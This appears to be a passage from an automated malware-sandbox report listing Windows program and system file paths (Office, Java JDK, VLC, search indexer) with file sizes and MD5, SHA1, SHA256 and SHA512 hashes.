648e9ab8b0503a28b75216a1feef4fcebe9c70913c1131abcc429500c47efe68

SHA512
7fa23ba7e310d3772c357bd03d08f2eed7d5539e02cf8fb04161913d30250404133391e77b7bca63df23ea68416bebc7f3fc51abeca0ba02e0fa9f475df6dd47

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\WINWORD_K_COL.HXK

Filesize
1KB

MD5
24466bb236ac99d83073ffa86d842243

SHA1
77f23b32ff7e7fcba3cd73b92931fda2188a8bcd

SHA256
b21e05a7d76d12083b840bb85de66bc1b9f1c6a1c6dc83017c6dd21dee103ec0

SHA512
eee61b03fd4200df22ccdfe64057ec1f3e6abf8dc5ac540b077b75ea045772cd110b9bd5ff49b0444f035b262b7b54a2426bb9955c2023940c52f2beb959b495

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Style\SIST02.XSL

Filesize
240KB

MD5
b06b198640b008622c5133e370293ea9

SHA1
cd7c56ce17a052031123effee41ebed2c51fc78d

SHA256
57fdd61856d9289b34bddaa5d70735e84598205fefc2f5fb74f332db0e89370c

SHA512
c2086077fa7a9820a780e3a8289388acc42f2a945e65549f2ddf054f337ade621a5b82dd861688560f44cc1acabd4e8326786a4281fcfd0555b5dc6641b5df66

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Biscay\TAB_OFF.GIF

Filesize
1KB

MD5
87fa2e68683f5dcef7daba2dec3e4a06

SHA1
368a3a24d1bdacd70f341820c61009ecdc4241d2

SHA256
5c5616ad5469eb6a455e0dad608ca98cb672a80cf01d175341566a15471a25e1

SHA512
6898e6c3d8cf26aba1dc092f1ad2eb096a2e30b3167af6390c2c1b65c1e0560f15b2e28331f9f335540e3d0ffb67b07bfb7cf5cd7ffdf123455d3eef88ec7e4b

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Biscay\TAB_ON.GIF

Filesize
1KB

MD5
a209f06cd22d2d9ff0c6e2a7ac12adb1

SHA1
c7cdb4c0a4268f708fea48498b3e3cdb077fc8d7

SHA256
3ffc532fb6c2c158604a275ae142a4b1bef4c6cdf6aef78f92f98120717e6654

SHA512
641378de039301fc4005924cdf71ee79eef44372dabe0961e975ec10240ef6a67bef8b00a0d4444ce4eeb0398af7ffb6dd755d6a09a3970713751ec6b96153be

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Swirl\tab_off.gif

Filesize
1KB

MD5
591397badbd5fab5d3c17ae2c686005d

SHA1
88eabc299890162e9de9daa183bb4c39f3ae8a79

SHA256
aef38630af538f376639c0e5a78301666610eed296e27564e5fcefe7d0c54a39

SHA512
1f978cad137fdf5426db7efff57828d2a2d33a71ee8f26e31ffb356acdbe76149dc2a24c8c6f4439cf96db5f0b3a6395b078adbe8254bfaaa7dbd9a2c5c91d9d

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Swirl\tab_on.gif

Filesize
1KB

MD5
fff81f375c1a5594cd5f64f594b16a08

SHA1
4b43bd1c8580ca007f7bcb587facf059f2998c24

SHA256
384d507e7abcd3059e0ccd37cf695321d594b4ee2285caa8dbf9792826bc5198

SHA512
e95d9f34e7796c83c20386cbea09eb3a0b566b6cdc75526c806cc03bef632f61b19247aa342d6de25ff1ed3ddf8aa381d6ffabd3def1c7e02b6ccf8926c0034a

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SoftBlue\TAB_OFF.GIF

Filesize
1KB

MD5
883bab6266e57b0ac2abbb29513dd05f

SHA1
ad53135ad7a22bfb2e6337d16dd200f365dd3b93

SHA256
6a72fa59e82b3df6ca1b02e6ff8769f9b0f021c879333349b804e16aaa3c4c8c

SHA512
3c6ded5f41749b3ca70e31eb878a0e176cd60d1f7cc5dd1b060065f6bc40dc71cc43940087d316dcb14fa76d3bf50e5a035b87600c3bc0d13c48b663eb7e3b94

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SoftBlue\TAB_ON.GIF

Filesize
1KB

MD5
64831075e1da549626f024db457948d1

SHA1
864ba1dfc0cef8f9da3b50102f905cc5f8794890

SHA256
156139dd95473fe1eee9704de4575a78500b7da314ebb6c68a31c6c0067f0419

SHA512
5aa632ed53d4fc4012760673cc9941406e1005ac8912a47e9772392ad95af221e7d00068b06d1c479d77c6dd2001d9548f24f39e515566860183873e371bd015

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\InfoPathOMV12\Microsoft.Office.InfoPath.xml

Filesize
248KB

MD5
800381b31c98ccaa3419eaca66b2ad1b

SHA1
01bf1276baa6c0c0090dfd97b46f0f351404a122

SHA256
c1790d30c3b6400b0dec27d3a2c2cadcc56e7fad4c1972b98359abfa91becb02

SHA512
66b89cee55ec1936197c0113bf6fda57edb9b241d11d9aa7df0838cc91170779ef396d0be9438f4e6f1d89cf238ac0f3bc5ccf028094b9fd41fc2d7f633e8bed

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.XML

Filesize
2KB

MD5
2f63c4edc19781ec4bd896f58b9483fb

SHA1
361e8f2f33905c2b51cb2eed48cc02bbd79e84e0

SHA256
70873744acf0549c319dad1504a4e38e21042371ba7d7fb2248f65e2fdc79ee9

SHA512
546ae2e44c747dbd65905d7291602cbb9304b3007a59d5077166dd6c582f412ecc37bf2d963e6f7f12ab1a712b22345c86748b60fb8e2124315312e72c3d8007

Download Submit
C:\Program Files\Java\jdk1.7.0_80\db\bin\NetworkServerControl

Filesize
7KB

MD5
337273d2b863503b1f0b6ef0a78ac968

SHA1
8a773755bca98e3b3495e88e17b116781d6b20aa

SHA256
00bfbd5f0a618a8db734fbd46f8d2b1ef262ccc65381263d659791c038fdabbe

SHA512
46644c89ef17d36e1764f6af11deada398c7a320adf00cb5af6dbe71acf29414715cf73165208934747eaf3539c0b6f253675f0b498ae06bacbd5a386620f5c7

Download Submit
C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_LinkNoDrop32x32.gif

Filesize
1KB

MD5
c9bdc189f6de4dcb963dd015d002fe60

SHA1
e073dd83f6a04a55e552809227dc6ca63a2368d2

SHA256
7c499396d0faeac97532ad9088b77edd11664d47e1ba5814cdbf53de032aa26d

SHA512
6fd66fb82374de85b4276e8a63bf84facb45b95b172ea3ee5c190671b3338141453517ccd8b707f85b3f573340df05477da332e98af0fc562f21fa6c916d7d11

Download Submit
C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\UTC

Filesize
1KB

MD5
6c102eb4e9cafa1947030bf9bf3a5de1

SHA1
5a02c6ef7e9d22dac3c815b9dfdbda35efafd4b1

SHA256
a52c3dbedca28342116b4a1cf422436a0a05cc47fa04e418539c75e8a56b0fb2

SHA512
710944bc16b09579e5100662a6f3adf89cb7131614cf040f0d92cab89fc91903aa7d0473dc36429b491534683c89b0b9c57f25571126d1f720f4b86b9cffcbdb

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\epl-v10.html

Filesize
13KB

MD5
20cc1c1ef4de183732ff4face1209c87

SHA1
36654418b155dc9330172ee8ce0d1b706dd286bd

SHA256
7df3a2cabcc7a7b437651d7875fb84afe6e4f6190c6df83e39eb800c18f7af44

SHA512
d8dc06c5da1f3d1db2c0f120d6d7e0639ef23c7856c31ac5462345273707fb0a083b6e3d95531d9defc8de038d86beb4acfcb92e31a9884d9e80d11578d07f8d

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\license.html

Filesize
10KB

MD5
767a17a6ef7073687d8102a0f2b0e7fc

SHA1
ab99666462b1acf854c444517efb4b9d4280f797

SHA256
9a9b0753d6100928d7311bae5ab8b040545dbc61d9e3ccf16a6b4969dab8eeb8

SHA512
fb7eb3fca4dfb7cc79eca9cd597f7dd0b7845460df48ed4f5c8b4fb6dc165b50598070be2ec2ff5119274691ffdc9f24e835c9b4d85ca36c6b60945b7af0cc68

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf

Filesize
1KB

MD5
bc609524f45f5987b0bdaa86552b7abe

SHA1
c348ec387f3fe15ea970bc56ffb151654443a503

SHA256
66752faa1f8e8c65678585a8e868e9ab72a9a2ce940e0d9c9f0df3df6e9952fc

SHA512
8e9094e4562f7acd9cab614cdb5462c2498e8c3ba8bd8659975323a139c041b5a9dfa8b86c45de8f8cd24b5ea67843b54a214726ac6e3eb5200d343e13b75d99

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\license.html

Filesize
10KB

MD5
b2f43717fbebcb797e2497cd51bd2fc2

SHA1
e24184d0fcb90211b1cf83c3f1422901d89e7eaa

SHA256
8ded66cc63945eb2ce7ef5a4ebc268c52a699e3d7ba1a1cd8686c7796ac464ea

SHA512
4526637970ca305de230e786bf7484dc124bcb6b155fdc4ba0948967046f457cbc480f9d07db6f48c394f8c05ca9945929a000ab41699d4bb2e95e68b9808cc8

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA

Filesize
9KB

MD5
9305a005324d722932e5873b9b813585

SHA1
9e206655cab1384660c822bfe7f84e6815bf33a7

SHA256
8eecc75915b29598bb1b35b3427534c59d1a586c4846f9432d060c6795f35545

SHA512
947a98c6febfa86058df173e724c0cc900a927f284c5dee40f238ed194a36b111a400de46a4c85422f36d8ef886e2feabc5f5c2aa679b9c82edfa23216b69287

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\epl-v10.html

Filesize
13KB

MD5
7cfa14161ede8701412a61855c24a571

SHA1
c1a32d08b53aeb8c13749954b3a1c2a420e22d53

SHA256
2fbe774c025a1b7e27d17aecfe87016498dcdf1df1a0ea177c00b2b1a86bf8dd

SHA512
a6616423794f201619b9c7c8d3380e934b513578d204b7c8837d6314eef29beed8059c6137861cd4689bf3934c8dda9cf715f74b67e7fe6e8cddc42e6378d774

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\ECLIPSE_.RSA

Filesize
9KB

MD5
a998540cbc5fee9368fb5bfd0415689c

SHA1
03f8066c10c7574691a49b6c58d83a0c594a6f6f

SHA256
f4dad2244c8c50bec4f54449f769735f223fa362193b8c09f6445c82afb321ff

SHA512
b32939314501d9cbcf300268a55c49cf85aba5bb36295554936adbd3f538f9c3b0ecd429f5128fd7e87bef887d6e0b5b24945e55f9f8dbb5cb52fcebbe0ff5f2

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-core-io-ui.xml_hidden.itlock13

Filesize
1KB

MD5
f9d663d007465636bc352fad687431cc

SHA1
41d4488bf75e2fe43341388bcab2fcbafe9253ea

SHA256
bd30f11b8727856893c83e5d4571212e5577f4d52038c304cf7b36d6559559ad

SHA512
56212742f5b9749b08a1622f5c36e1a7b607f29d8cb328376199ecd8d8e4daa9f184a4199661b40f96ec70a074382d98d79011cab0bb8ed1df3f889b37a36f80

Download Submit
C:\Program Files\Java\jre7\lib\zi\Etc\UTC

Filesize
1KB

MD5
a9625df12a85a78670f54c428af6355e

SHA1
22189f53ca90c8533c76cf3418c9e54dc733b8ad

SHA256
62690b526eb1462efe0500472879f31288c1c75a7a1e7a716b5876fc71ff357b

SHA512
058f0197ab00489fd297af68edb7df9454398d706c661ceb2dcddedbe95a867b2e507bbf30f699b38e5452597dbd23dc251edbfacf7733682935c5fdeb611de9

Download Submit
C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\vlc.mo

Filesize
586KB

MD5
f57a1a5e0d5e18cc3bff9b3cca2ae961

SHA1
2ddb9ef7e157e4b7f02a8abefb00330aeff231fd

SHA256
9a8c9085898a1ae81a3a4f8abcfdb3be1390a330120b0200eec6e16ffb1cc453

SHA512
0b61e465cdf3f54d1723e6027f670faf4cd67551cc9c8219ca1ed8d37abd870a8bbaac0d77327ea2f3c33309d75f9398a73dbfbcd0b3b55185ffd14087174cde

Download Submit
C:\Program Files\VideoLAN\VLC\locale\es_MX\LC_MESSAGES\vlc.mo

Filesize
610KB

MD5
5a2004b02c5d5789d2e4bd89ff86e297

SHA1
6f87b2a2deaee2d21bd1bbb50da8cb7ab39c9c97

SHA256
2c133a4eef8768a41d27f9db1fb72a43c6e43d372d7b57ed61b68e6a899d360f

SHA512
efa27bf5ab0843f8ddcdfd3cddf79144ff2507465985a62443253041a5bcf21b05d12955682c7bb1056b1f6eec2df84ea82ddf6cdb978cb06468c4f3dace63c0

Download Submit
C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\vlc.mo

Filesize
579KB

MD5
36f5864431b147bdfd57b4c96b3c1454

SHA1
eaa1ec80cb2395856409794fda37e381d9563e66

SHA256
16a755f3585e980b32d17dad11e8df52c55e2d697fd45166ed34f033082ac5f3

SHA512
fa4337cc025de08cc71e574fbf1beeac455e32ff741f9cca44423477630b85a77f9ccb770fd77c69f7595134ce7ad0be89de6c79ab6c864ae6cd185db3764db1

Download Submit
C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\vlc.mo

Filesize
551KB

MD5
ab81fb8d547cbd52647f9ac8b35c1cd8

SHA1
f9361da8a9ca086ce6b85d100e51056996f18e9b

SHA256
f25c04ffd212e9ee66f25609d5cd6a43d1dc3910a7130044683bdc761b5229da

SHA512
3518ecc3af13b4d43e50d33523283ad835bb269d2c95124c40483e7f1489b5b2004168e8c659e2591f81e2dd24ad1aac72ccec4a789a94564e0b70bb88e310c6

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\es-ES\Help_MValidator.Lck

Filesize
1KB

MD5
4d49187610a280f75d85a6076d93efd3

SHA1
5d61d8836e5925cf6829b81e1b42a5351da8ab8c

SHA256
8a978dff3ffd8f593b2c8fb1d11abd7252c60b6018c659523e29c7eea77fdf8f

SHA512
b768bd9052bfdd0fd7cac6d78ba85b5f367bfbebf48b48be166a9fd51a207f9eeb246f0cd9a0d2ff7eccfc57a6fcfe068bf2a0f91e9cd6b1a58ce585cbbb2962

Download Submit
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0002.001

Filesize
1KB

MD5
b16d9ae9b055126898850b30ae584147

SHA1
a162a226d310e795eef19678b553679e7670ba5a

SHA256
138ddb4c2eb95d8078645313011dc6e4bf3a504787dc49c1e3319fe6f13cf59b

SHA512
28f80ef5206beb9c6a298ed9d29a3ec2c81bbe2aca83466ec97d1005d679841b011e029bd94a08c97ef744235f7e82860d0e51b6209f7c9ed494cf3581602ada

Download Submit
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAD0001.000

Filesize
1KB

MD5
20ed4c2fd7be16588493dd8850e4ad43

SHA1
3782a64822e653dbf359f6821eefc7b112fb9662

SHA256
6ab8b89f856fa48ad5c740d60a6b82b2384a8f3ea98ccdadbab83c691c59a58c

SHA512
8feaa11b56d423588fa6fd5b44d8cc7d0973025dcd46e1455f2bbcdee0cf12aec43436a9a5be3506149493a091475c817fa8ce51c59b3587d182c0ff3c5821fb

Download Submit